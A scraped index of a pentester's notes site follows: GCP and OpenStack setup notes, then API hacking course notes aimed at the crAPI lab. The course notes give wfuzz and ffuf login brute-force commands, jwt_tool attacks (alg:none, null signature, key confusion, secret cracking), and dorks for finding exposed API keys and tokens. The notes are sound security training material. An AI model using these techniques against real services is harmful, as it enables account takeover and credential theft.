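As a hedged one-liner (the image name is hypothetical), Cloud Build can build from the Dockerfile in the current directory and push the result to the registry:

gcloud builds submit --tag gcr.io/$PROJECT_ID/my-app .\n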

              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#93-google-container-registry","title":"9.3. Google Container Registry","text":"

Google Cloud Source Repositories stores your source code, while Cloud Build is responsible for building and packaging your applications. Container Registry stores the Docker images and artifacts in a centralized registry.

              • Single location to manage container images and repositories.
              • Store images close to GCE, GKE, and Kubernetes clusters: Because the Container Registry is co-located with Compute it is going to be extremely fast.
              • Secure, private, scalable Docker registry within GCP.
              • Supports RBAC to access, view, and download images.
• Detects vulnerabilities in early stages of software deployment.
              • Supports automatic lock-down of vulnerable container images.
              • Automated container build process based on code or tag changes.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#use-case-adding-an-image-to-gcp-container-registry","title":"Use case: adding an image to GCP Container Registry","text":"

In the GCP Dashboard, go to Container Registry. The first time, it will be empty.

              # Run the below commands in Google Cloud Shell \n gcloud services enable containerregistry.googleapis.com \n\nexport PROJECT_ID=<PROJECT ID> # Replace this with your GCP Project ID \n\ndocker pull busybox \ndocker images \n
cat <<EOF >Dockerfile \nFROM busybox:latest \nCMD [\"date\"] \nEOF\n
docker build . -t mybusybox\n\n# Tag your image with the convention stated by GCP\ndocker tag mybusybox gcr.io/$PROJECT_ID/mybusybox:latest \n# When listing images with docker images, you will see it renamed.\n\n# Run your image\ndocker run gcr.io/$PROJECT_ID/mybusybox:latest \n\n# Wire the credentials of GCP Container Registry with Docker\ngcloud auth configure-docker \n\n# Take our mybusybox image available in the environment and push it to the Container Registry.\ndocker push gcr.io/$PROJECT_ID/mybusybox:latest \n
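To verify the push, a couple of hedged follow-up commands (assuming the same $PROJECT_ID) list what the registry now holds:

# List images stored under the project's registry\ngcloud container images list --repository=gcr.io/$PROJECT_ID\n\n# List tags for the image we just pushed\ngcloud container images list-tags gcr.io/$PROJECT_ID/mybusybox\n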
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#94-devel-tools-integration","title":"9.4. Devel Tools Integration","text":"
              • IDE plugins for popular development tools.
                • IntelliJ.
                • Visual Studio.
                • Eclipse.
              • Tight integration between IDEs and managed SCM, build services.
              • Automates generating configuration files and deployment scripts.
              • Makes GCP libraries and SDKs available within the IDEs.
              • Enhances developer productivity
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#10-other-gcp-services","title":"10. Other GCP services","text":"","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#101-iot-services","title":"10.1. IoT Services","text":"

              GCP IoT has two essential services.

• Cloud IoT Core: provides machine-to-machine communication, a device registry, and overall device management capabilities. If you have multiple sensors, actuators, and devices that need to be connected to the cloud, you would use IoT Core. It provides authentication and authorization of devices, enables machines to talk to each other, and lets you manage the entire lifecycle of devices. Tightly integrated with Cloud Pub/Sub and Cloud Functions.
• Edge TPU: hardware available to accelerate AI models running at the edge. An edge device can run business logic and even artificial intelligence models in offline mode, so the Edge TPU plays the role of a micro TPU/GPU attached to edge devices. When you run a TensorFlow model on a device powered by an Edge TPU, inference, that is, the process of performing classification, detection, or prediction, is much faster. The Edge TPU is available as a chip that can be attached to an edge device such as a Raspberry Pi or an x86 device.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#102-api-management","title":"10.2. API Management","text":"
• Apigee API Platform provides the capabilities for designing, securing, publishing, analyzing, and monitoring APIs. Developers can use the Apigee API Platform to manage the end-to-end lifecycle of APIs.
              • API Analytics: API analytics provide end-to-end visibility across API programs with developer engagement and business metrics.
• Cloud Endpoints is a service for developing, deploying, and managing APIs in the Google Cloud environment. It is based on an NGINX-based proxy and uses the OpenAPI Specification as its API framework. Cloud Endpoints gives developers the tools they need to manage the entire API lifecycle, from initial development through deployment and maintenance, with tight integration into GCP.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#103-hybrid-and-multicloud-services","title":"10.3. Hybrid and Multicloud Services","text":"
              • Traffic Director routes the traffic across virtual machines and containers deployed across multiple regions.
              • Stackdriver is the observability platform for tracing, debugging, logging, and gaining insights into application performance and infrastructure monitoring.
              • GKE On-Prem takes Google Kubernetes engine and runs that within the local data center environment or on-premises.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#104-anthos","title":"10.4. Anthos","text":"
• Anthos is Google's multi-cloud and hybrid cloud platform based on Kubernetes and GKE.
• Anthos enables the managed Kubernetes service (GKE) in a variety of environments: customers can run and take control of multiple Kubernetes clusters deployed through GKE and run them in other cloud environments.
              • Anthos can be deployed in:
                • Google Cloud
                • vSphere (on-premises)
                • Amazon Web Services
                • Microsoft Azure
              • Non-GKE Kubernetes clusters can be attached to Anthos: Apart from launching and managing Kubernetes clusters through Anthos, you can also onboard and register clusters that were created outside of Anthos.
              • Delivers centralized management and operations for Kubernetes clusters running diverse environments.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/gcp/gcp-essentials/#105-migration-tools","title":"10.5. Migration Tools","text":"
              • Transfer Appliance provides bulk data transfer from your data center to the cloud based on a physical appliance.
• Migrate for Compute Engine is based on a tool called Velostrata that Google acquired in 2018, and it provides the capability of migrating existing virtual machines, or even physical machines, into GCE VMs.
• BigQuery Data Transfer Service is a tool to run scheduled uploads from third-party SaaS tools and platforms into the BigQuery data platform.
              ","tags":["cloud","gcp","google cloud platform","public cloud"]},{"location":"cloud/openstasck/openstack-essentials/","title":"Openstack Essentials","text":"

OpenStack is a set of open source software tools for building and managing cloud computing platforms for public and private clouds. Go to the official documentation.

It can be managed from a web dashboard, from command-line tools, and from RESTful web services.
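As a hedged sketch of the command-line route (resource names are hypothetical and vary per deployment), the openstack client covers the common operations:

# Load credentials first (e.g., the openrc file provided by your deployment)\nsource openrc\n\n# Basic inventory\nopenstack image list\nopenstack flavor list\n\n# Boot and list a test instance (image/flavor names are hypothetical)\nopenstack server create --image cirros --flavor m1.tiny my-vm\nopenstack server list\n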

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#overview-of-openstack-services","title":"Overview of OpenStack services","text":"","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#quick-start","title":"Quick Start","text":"

              Follow instructions from: https://docs.openstack.org/devstack/latest/

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#1-install-linux","title":"1. Install Linux","text":"

              Start with a clean and minimal install of a Linux system. DevStack attempts to support the two latest LTS releases of Ubuntu, Rocky Linux 9 and openEuler.

              If you do not have a preference, Ubuntu 22.04 (Jammy) is the most tested, and will probably go the smoothest.

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#2-add-stack-user-optional","title":"2. Add Stack User (optional)","text":"

              DevStack should be run as a non-root user with sudo enabled (standard logins to cloud images such as \u201cubuntu\u201d or \u201ccloud-user\u201d are usually fine).

If you are not using a cloud image, you can create a separate stack user to run DevStack with

              sudo useradd -s /bin/bash -d /opt/stack -m stack\n

Ensure the home directory for the stack user has executable permission for all, as RHEL-based distros create it with 700 and Ubuntu 21.04+ with 750, which can cause issues during deployment.

              sudo chmod +x /opt/stack\n

              Since this user will be making many changes to your system, it should have sudo privileges:

              echo \"stack ALL=(ALL) NOPASSWD: ALL\" | sudo tee /etc/sudoers.d/stack\nsudo -u stack -i\n
              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#3-download-devstack","title":"3. Download DevStack","text":"
              git clone https://opendev.org/openstack/devstack\ncd devstack\n

The devstack repo contains a script that installs OpenStack and templates for configuration files.

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#4-create-a-localconf","title":"4. Create a local.conf","text":"

Create a local.conf file with four passwords preset at the root of the devstack git repo.

              [[local|localrc]]\nADMIN_PASSWORD=secret\nDATABASE_PASSWORD=$ADMIN_PASSWORD\nRABBIT_PASSWORD=$ADMIN_PASSWORD\nSERVICE_PASSWORD=$ADMIN_PASSWORD\n

This is the minimum required config to get started with DevStack. There is a sample local.conf file under the samples directory in the devstack repository.

              Warning: Only use alphanumeric characters in your passwords, as some services fail to work when using special characters.

              ","tags":["cloud","Openstack","open source"]},{"location":"cloud/openstasck/openstack-essentials/#5-start-the-install","title":"5. Start the install","text":"
              ./stack.sh\n

              This will take 15 - 30 minutes, largely depending on the speed of your internet connection. Many git trees and packages will be installed during this process.

              ","tags":["cloud","Openstack","open source"]},{"location":"files/index-of-files/","title":"Index of downloads","text":"

              These are some of the tools that I use when conducting penetration testing. Most of them have their own updated repositories, so the best approach for you would be to visit the official repository or download the source code. In my case, when dealing with restricted environments, there are times when I require a direct download of a previously verified and clean file. Therefore, the main goal of this list is to provide me with these resources when needed, within a matter of seconds.

              • Binscope: BinScope_x64.msi
              • Echo Mirage: EchoMirage.zip | Echo Mirage at HackingLife
              • Processhacker 2.39 bin: processhacker-2.39-bin.zip | Process Hacker Monitor at HackingLife.
              • RegistryChangesView:
                • RegistryChangesView (x64): registrychangesview-x64.zip
                • RegistryChangesView (x86): registrychangesview-x86.zip
              • Regshot 1.9.0: Regshot-1.9.0.zip | Regshot at HackingLife
              • Visual Studio Code - Community downloader: vs_community__bb594837aa124b4d8487a41015a6017a.exe
              ","tags":["resources"]},{"location":"files/index-of-files/#reporting","title":"Reporting","text":"

              https://pentestreports.com/

              ","tags":["resources"]},{"location":"hackingapis/","title":"Hacking APIs","text":"","tags":["api"]},{"location":"hackingapis/#about-the-course","title":"About the course","text":"

Notes from the course \"APIsec Certified Expert\", a practical course in API hacking taught by Corey J. Ball.

              Course: https://university.apisec.ai/

              Book: https://www.amazon.com/Hacking-APIs-Application-Programming-Interfaces/dp/1718502443

              Instructor: Corey J. Ball.

              ","tags":["api"]},{"location":"hackingapis/#general-index-of-the-course","title":"General index of the course","text":"
              • Setting up the environment
              • Setting up the labs + Writeups
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/","title":"API authentication attacks","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#classic-authentication-attacks","title":"Classic authentication attacks","text":"

We'll consider two attacks: password brute-force and password spraying. These attacks may take place whenever Basic Authentication is deployed in the context of a RESTful API.

              The principle of Basic authentication is that the consumer issues a request containing a username and password.

Since RESTful APIs don't maintain state, the API would need to leverage basic authentication across all endpoints. Instead of doing this, the API may use basic authentication once, at an authentication portal; upon providing the correct credentials, a token is issued to be used in subsequent requests.
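A hedged curl sketch of that flow against the local crAPI lab endpoint used later in these notes (the credentials, token, and dashboard path are illustrative):

# 1. Authenticate once with credentials (illustrative values)\ncurl -s -X POST http://localhost:8888/identity/api/auth/login -H \"Content-Type: application/json\" -d '{\"email\":\"hapihacker@hapihacjer.com\",\"password\":\"Password1!\"}'\n\n# 2. Reuse the issued token as a Bearer header on subsequent requests\ncurl -s http://localhost:8888/identity/api/v2/user/dashboard -H \"Authorization: Bearer <token>\"\n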

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#1-password-brute-force-attacks","title":"1. Password Brute-Force Attacks","text":"

              Brute-forcing an API's authentication is not very different from any other brute-force attack, except you will send the request to an API endpoint, the payload will often be in JSON, and the authentication values may be base64 encoded.

There are countless ways to do it. You can use:

              • Intruder module of BurpSuite.
              • ZAP proxy tool.
              • wfuzz.
              • ffuf.
              • others.

              Let's see wfuzz:

wfuzz -d '{\"email\":\"hapihacker@hapihacjer.com\",\"password\":\"FUZZ\"}' -z file,/usr/share/wordlists/rockyou.txt -u http://localhost:8888/identity/api/auth/login --hc 500\n# -H to specify content-type headers. \n# -d allows you to include the POST body data (quoted so the shell passes the JSON intact); FUZZ marks where the wordlist payloads are injected. \n# -u specifies the url\n# --hc/hl/hw/hh hide responses with the specified code/lines/words/chars. In our case, \"--hc 500\" hides 500 code responses.\n# -z specifies a payload   \n
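The same brute force sketched with ffuf, mentioned in the list above (a hedged equivalent; FUZZ is ffuf's default payload marker):

ffuf -w /usr/share/wordlists/rockyou.txt -X POST -u http://localhost:8888/identity/api/auth/login -H \"Content-Type: application/json\" -d '{\"email\":\"hapihacker@hapihacjer.com\",\"password\":\"FUZZ\"}' -fc 500\n# -X sets the HTTP method, -d the POST body, -fc filters out responses by status code\n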

Tools to build password lists:

• https://github.com/sc0tfree/mentalist
• CUPP - Common User Password Profiler
• crunch (already installed in Kali)

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#2-password-spraying","title":"2. Password Spraying","text":"

Password spraying is very useful if you know the password policy of the API we are attacking. Say there is an account lockout policy after ten tries: you can then run a password spraying attack with nine tries, using the nine most probable passwords against all the account emails spotted.

Since in crAPI we previously detected an information disclosure on the forum page (a JSON response with all kinds of data from users who have posted on the forum), we can save that JSON response as response.json and filter out the users' emails:

The grep command below pulls everything out of a file that resembles an email. You can save the captured emails to a file and use that file as a payload in Burp Suite; piping through sort -u gets rid of duplicate emails.

grep -oe \"[a-zA-Z0-9._]\\+@[a-zA-Z]\\+.[a-zA-Z]\\+\" response.json | sort -u > mailusers.txt\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#api-authentication-attacks_1","title":"API Authentication Attacks","text":"

To go further with authentication attacks, we need to analyze the API tokens and the way they are generated; when talking about token generation and analysis, one word comes up immediately: entropy.

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#entropy-analysis-burpsuite-sequencers-live-capture","title":"Entropy analysis: BurpSuite Sequencer's live capture","text":"

              Instructions to set up a proxy in Postman to intercept traffic with BurpSuite and have it sent to Sequencer.

              Once you send a POST request (in which a token is generated) to Sequencer, you need to define the custom token location in the context menu. After that you can click on \"Start Live Capture\".

              BurpSuite Sequencer provides two methods for token analysis:

• Manually analyzing tokens provided in a text file. To perform a manual analysis, you need to provide BurpSuite Sequencer with a minimum of 100 tokens.
              • Performing a live capture to automatically generate tokens.

Let's focus our attention on a live capture using BurpSuite Sequencer. A live capture will provide us with 20,000 automatically generated tokens. What for?

• To produce a token analysis report that measures the entropy of the token generation process (and gives us precious tips on how to brute-force, password spray, or bypass the authentication). For instance, if an API provider is generating tokens sequentially, then even if the token were 20-plus characters long, it could be that many of the characters in the token do not actually change.
• To build a large collection of 20,000 identities, which can help us evade security controls.

              The token analysis report

• The summary of the findings provides info about the quality of randomness within the token sample. The goal is to determine if there are parts of the token that do not change and other parts that often change. Full entropy would be 100% randomness (no patterns found).
              • Character-level analysis provides the degree of confidence in the randomness of the sample at each character position. The significance level at each position is the probability of the observed character-level results occurring.
              • Bit-level analysis indicates the degree of confidence in the randomness of the sample at each bit position.
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#jwt-attacks","title":"JWT attacks","text":"

Two tools: jwt.io and jwt_tool.

              To see a jwt decoded on your CLI:

              jwt_tool eyJhbGciOiJIUzUxMiJ9.eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk\n1NDgyOTl9.yeyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0IjoxNjY5NDYxODk5LCJleHAiOjE2Njk121Lj2Doa7rA9oUQk1Px7b2hUCMQJeyCsGYLbJ8hZMWc7304aX_hfkLB__1o2YfU49VajMBhhRVP_OYNafttug \n

              Result:

Also, to see the decoded JWT, knowing that it is encoded in base64, we could echo each of its parts:

              echo eyJhbGciOiJIUzUxMiJ9 | base64 -d  && echo eyJzdWIiOiJoYXBpaGFja2VyQGhhcGloYWNoZXIuY29tIiwiaWF0\nIjoxNjY5NDYxODk5LCJleHAiOjE2Njk1NDgyOTl9 | base64 -d\n

              Results:

              {\"alg\":\"HS512\"}{\"sub\":\"hapihacker@hapihacher.com\",\"iat\":1669461899,\"exp\":1669548299} \n

              To run a JWT scan with jwt_tool, run:

              jwt_tool -t <http://target-site.com/> -rh \"<Header>: <JWT_Token>\" -M pb\n# in the target site specify a path that leverages a call to a token\n# replace Header with the name of the Header and JWT_Tocker with the actual token.\n# -M: Scanning mode. 'pb' is playbook audit. 'er': fuzz existing claims to force errors. 'cc': fuzz common claims. 'at': All tests.\n

              Example:

Some more jwt_tool flags that may come in handy:

              # -X EXPLOIT, --exploit EXPLOIT\n#                        eXploit known vulnerabilities:\n#                        a = alg:none\n#                        n = null signature\n#                        b = blank password accepted in signature\n#                        s = spoof JWKS (specify JWKS URL with -ju, or set in jwtconf.ini to automate this attack)\n#                        k = key confusion (specify public key with -pk)\n#                        i = inject inline JWKS\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#1-the-none-attack","title":"1. The none attack","text":"

              A JWT with \"none\" as its algorithm is a free ticket. Modify user and become admin, root,... Also, in poorly implemented JWT, sometimes user and password can be found in the payload.

              To craft a jwt with \"none\" as the value for \"alg\", run:

              jwt_tool <JWT_Token> -X a\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#2-the-null-signature-attack","title":"2. The null signature attack","text":"

The second attack in this section is removing the signature from the token. This can be done by erasing the signature altogether while leaving the last period in place.
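A hedged before/after sketch (the header and payload here decode to {\"alg\":\"HS256\"} and {\"sub\":\"admin\"}; the signature is a placeholder):

# Original token: header.payload.signature\neyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9.<signature>\n\n# Null signature: signature removed, trailing period kept\neyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9.\n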

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#the-blank-password-accepted-in-signature","title":"The blank password accepted in signature","text":"

Launching this attack is relatively simple. Just remove the password value from the payload and leave it blank. Then, regenerate the JWT.

              Also, with jwt_tool, run:

              jwt_tool <JWT_Token> -X b\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#3-the-algorithm-switch-or-key-confusion-attack","title":"3. The algorithm switch (or key-confusion) attack","text":"

              A more likely scenario than the provider accepting no algorithm is that they accept multiple algorithms. For example, if the provider uses RS256 but doesn\u2019t limit the acceptable algorithm values, we could alter the algorithm to HS256. This is useful, as RS256 is an asymmetric encryption scheme, meaning we need both the provider\u2019s private key and a public key in order to accurately hash the JWT signature. Meanwhile, HS256 is symmetric encryption, so only one key is used for both the signature and verification of the token. If you can discover the provider\u2019s RS256 public key and then switch the algorithm from RS256 to HS256, there is a chance you may be able to leverage the RS256 public key as the HS256 key.

              jwt_tool <JWT_Token> -X k -pk public-key.pem\n# You will need to save the captured public key as a file on your attacking machine.\n
              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#4-the-jwt-crack-attack","title":"4. The jwt crack attack","text":"

              JWT_Tool can still test 12 million passwords in under a minute. To perform a JWT Crack attack using JWT_Tool, use the following command:

              jwt_tool <JWT Token> -C -d /wordlist.txt\n# -C indicates that you are conducting a hash crack attack\n# -d specifies the dictionary or wordlist\n

Once you crack the secret of the signature, we can create our own trusted tokens: 1. Grab another user's email (in the crAPI app, from the data exposure vulnerability when fetching the forum: GET {{baseUrl}}/community/api/v2/community/posts/recent). 2. Generate a token with the secret.
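With the cracked secret in hand, a hedged jwt_tool sketch for forging a token (the claim name and value are illustrative):

jwt_tool <JWT_Token> -I -pc sub -pv \"victim@example.com\" -S hs256 -p \"crackedsecret\"\n# -I injects/tampers claims; -pc/-pv select the payload claim and its new value\n# -S hs256 re-signs the token using the secret supplied with -p\n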

              ","tags":["api"]},{"location":"hackingapis/api-authentication-attacks/#5-spoofing-jws","title":"5. Spoofing JWS","text":"

Specify the JWKS URL with -ju, or set it in jwtconf.ini to automate this attack.

              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/","title":"Api Reconnaissance","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups
              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#passive-reconnaissance","title":"Passive reconnaissance","text":"","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#google-dorks","title":"Google Dorks","text":"

              More about google dorks.

| Google Dorking Query | Expected results |
| --- | --- |
| intitle:"api" site:"example.com" | Finds all publicly available API-related content on a given hostname. Another cool example for API versions: inurl:"/api/v1" site:"example.com" |
| intitle:"json" site:"example.com" | Many APIs use JSON, so this might be a cool filter |
| inurl:"/wp-json/wp/v2/users" | Finds all publicly available WordPress API user directories. |
| intitle:"index.of" intext:"api.txt" | Finds publicly available API key files. |
| inurl:"/api/v1" intext:"index of /" | Finds potentially interesting API directories. |
| intitle:"index of" api_key OR "api key" OR apiKey -pool | This is one of my favorite queries. It lists potentially exposed API keys. |
","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#github","title":"Github","text":"

More GitHub Dorking.

GitHub can also be a good platform to search for overshared information relating to APIs.

| GitHub Dorking Query | Expected results |
| --- | --- |
| applicationName api key | After getting results, filter by issue and you may find some API keys. It's common to leave API keys exposed when rebasing a git repo. Other terms to try: api_key, authorization_bearer, oauth, auth, authentication, client_secret, api_token, client_id, OTP, HOMEBREW_GITHUB_API_TOKEN, SF_USERNAME, HEROKU_API_KEY, JEKYLL_GITHUB_TOKEN, api.forecast.io, password, user_password, user_pass, passcode, client_secret, secret, password hash, user auth |
| extension: json nasa | Results show some extensions that include JSON, so they might be API related |
| shodan_api_key | Results show Shodan API keys |
| "authorization: Bearer" | This search reveals some authorization tokens. |
| filename: swagger.json | Go to the Code tab and you will have the swagger file. |
","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#shodan","title":"Shodan","text":"
| Shodan Dorking Query | Expected results |
| --- | --- |
| "content-type: application/json" | This type of content is usually related to APIs |
| "wp-json" | If you are using WordPress |
","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#waybackmachine","title":"WaybackMachine","text":"
| WaybackMachine Dorking Query | Expected results |
| --- | --- |
| Path to an API | We are trying to see if there is a recorded history of the API. It may provide us with endpoints that used to exist but allegedly no longer do. |
","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#active-reconnaissance","title":"Active reconnaissance","text":"","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#nmap","title":"nmap","text":"

              Nmap Cheat sheet.

              First, we do a service enumeration. The Nmap general detection scan uses default scripts (-sC) and service enumeration (-sV) against a target and then saves the output in three formats for later review (-oX for XML, -oN for Nmap, -oG for greppable, or -oA for all three):

              nmap -sC -sV [target address or network range] -oA nameofoutput\n

              The Nmap all-port scan will quickly check all 65,535 TCP ports for running services, application versions, and host operating system in use:

              nmap -p- [target address] -oA allportscan\n

You\u2019ll most likely discover APIs by looking at the results related to HTTP traffic and other indications of web servers. Typically, you\u2019ll find these running on ports 80 and 443, but an API can be hosted on all sorts of different ports. Once you discover a web server, you can perform HTTP enumeration using an Nmap NSE script (use -p to specify which ports you'd like to test).

              nmap -sV --script=http-enum $ip -p 80,443,8000,8080\n
              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#amass","title":"amass","text":"

              amass Cheat sheet.

              Before diving into using Amass, we should make the most of it by adding API keys to it.

              1. First, we can see which data sources are available for Amass (paid and free) by running:

              amass enum -list \n

              2. Next, we will need to create a config file to add our API keys to.

              sudo curl https://raw.githubusercontent.com/OWASP/Amass/master/examples/config.ini >~/.config/amass/config.ini\n

3. Now, open the file ~/.config/amass/config.ini and register with as many services as you can. Once you have obtained your API ID and secret, edit the config.ini file and add the credentials to it.

              sudo nano ~/.config/amass/config.ini\n

              4. Now, edit the file to add the sources. It is recommended to add:

• censys.io: takes the guesswork out of understanding and protecting your organization's digital footprint.
• https://asnlookup.com: quickly look up updated information about a specific Autonomous System Number (ASN), organization, CIDR, or registered IP addresses (IPv4 and IPv6), among other relevant data. Free and paid API access is offered.
• https://otx.alienvault.com: quickly identify if your endpoints have been compromised in major cyber attacks using OTX Endpoint Security, among many others.
              • https://bigdatacloud.com
              • https://cloudflare.com
              • https://www.digicert.com/tls-ssl/certcentral-tls-ssl-manager:
              • https://fullhunt.io
              • https://github.com
              • https://ipdata.co
              • https://leakix.net
              • as many more as you can.

              5. When ready, we can run amass:

              amass enum -active -d crapi.apisec.ai  \n

              Also, to be more precise:

              amass enum -active -d <target> | grep api\n# amass enum -active -d microsoft.com | grep api\n

Amass has several useful command-line options. Use the intel subcommand to collect SSL certificates, search reverse Whois records, and find ASN IDs associated with your target. Start by providing the command with target IP addresses:

              amass intel -addr [target IP addresses]\n

              If this scan is successful, it will provide you with domain names. These domains can then be passed to intel with the whois option to perform a reverse Whois lookup:

amass intel -d [target domain] -whois\n

              This could give you a ton of results. Focus on the interesting results that relate to your target organization. Once you have a list of interesting domains, upgrade to the enum subcommand to begin enumerating subdomains. If you specify the -passive option, Amass will refrain from directly interacting with your target:

              amass enum -passive -d [target domain]\n

              The active enum scan will perform much of the same scan as the passive one, but it will add domain name resolution, attempt DNS zone transfers, and grab SSL certificate information:

              amass enum -active -d [target domain]\n

              To up your game, add the -brute option to brute-force subdomains, -w to specify the API_superlist wordlist, and then the -dir option to send the output to the directory of your choice:

              amass enum -active -brute -w /usr/share/wordlists/API_superlist -d [target domain] -dir [directory name]  \n
              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#gobuster","title":"gobuster","text":"

              gobuster Cheat sheet.

Great tool for brute-force directory discovery, but it's not recursive (you need to specify a directory to perform a deeper scan), and its dictionaries are not API-specific. Here are some commands for Gobuster:

gobuster dir -u <exact target url> -w </path/dic.txt> --wildcard -b 401\n# the -b flag excludes a specific HTTP response code from the results\n
              ","tags":["api"]},{"location":"hackingapis/api-reconnaissance/#kiterunner","title":"Kiterunner","text":"

              kiterunner Cheat sheet.

Kiterunner is an excellent tool that was developed and released by Assetnote. Kiterunner is currently the best tool available for discovering API endpoints and resources. While directory brute-force tools like Gobuster and Dirbuster work to discover URL paths, they typically rely on standard HTTP GET requests. Kiterunner will not only use all HTTP request methods common with APIs (GET, POST, PUT, and DELETE) but also mimic common API path structures. In other words, instead of requesting GET /api/v1/user/create, Kiterunner will try POST /api/v1/user/create, mimicking a more realistic request.

1. First, download the dictionaries from the project. In my case, I downloaded them to /usr/share/wordlists/kiterunner/:

              • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-large.json.tar.gz
              • https://wordlists-cdn.assetnote.io/rawdata/kiterunner/routes-small.json.tar.gz
              • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-large.kite.tar.gz
              • https://wordlists-cdn.assetnote.io/data/kiterunner/routes-small.kite.tar.gz

              2. Run a quick scan of your target\u2019s URL or IP address like this:

kr scan http://127.0.0.1 -w ~/api/wordlists/data/kiterunner/routes-large.kite  \n

Note, however, that we conducted this scan without any authorization headers, which the target API likely requires.

              To use a dictionary (and not a kite file):

              kr brute <target> -w ~/api/wordlists/data/automated/nameofwordlist.txt\n

              If you have many targets, you can save a list of line-separated targets as a text file and use that file as the target.

              One of the coolest Kiterunner features is the ability to replay requests. Thus, not only will you have an interesting result to investigate, you will also be able to dissect exactly why that request is interesting. In order to replay a request, copy the entire line of content into Kiterunner, paste it using the kb replay option, and include the wordlist you used:

              kr kb replay \"GET     414 [    183,    7,   8]://192.168.50.35:8888/api/privatisations/count 0cf6841b1e7ac8badc6e237ab300a90ca873d571\" -w ~/api/wordlists/data/kiterunner/routes-large.kite\n

              Running this will replay the request and provide you with the HTTP response.

To run Kiterunner providing an authorization token, such as \"x-access-token\", take the full authorization token and add it to your Kiterunner scan with the -H option:

              kr scan http://IP -w /path/to/dict.txt -H 'x-access-token: eyJhGcwisdfdsfdfsdfsdfsdfdsfdsfddfdf.eyfakefakefakefaketokenfakeken._wcoooooo_kkkkkk_kkkk'\n
              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/","title":"Endpoint analysis","text":"General index of the course
              • Setting up the environment
              • Api Reconnaissance.
              • Endpoint Analysis.
              • Scanning APIS.
              • API Authorization Attacks.
              • Exploiting API Authorization.
              • Testing for Improper Assets Management.
              • Mass Assignment.
              • Server side Request Forgery.
              • Injection Attacks.
              • Evasion and Combining techniques.
              • Setting up the labs + Writeups

              If an API is not documented or the documentation is unavailable to you, then you will need to build out your own collection of requests. Two different methods:

              1. Build a collection in Postman
              2. Build out an API specification using mitmproxy2swagger.
              ","tags":["api"]},{"location":"hackingapis/endpoint-analysis/#build-a-collection-in-postman","title":"Build a collection in Postman","text":"

              In the instance where there is no documentation and no specification file, you will have to reverse-engineer the API based on your interactions with it. Mapping an API with several endpoints and a few methods can quickly grow into quite a large attack surface. There are two ways to manually reverse engineer an API with Postman.

              • One way is by constructing each request.
              • The other way is to proxy web traffic through Postman, then use it to capture a stream of requests. This process makes it much easier to construct requests within Postman, but you\u2019ll have to remove or ignore unrelated requests.
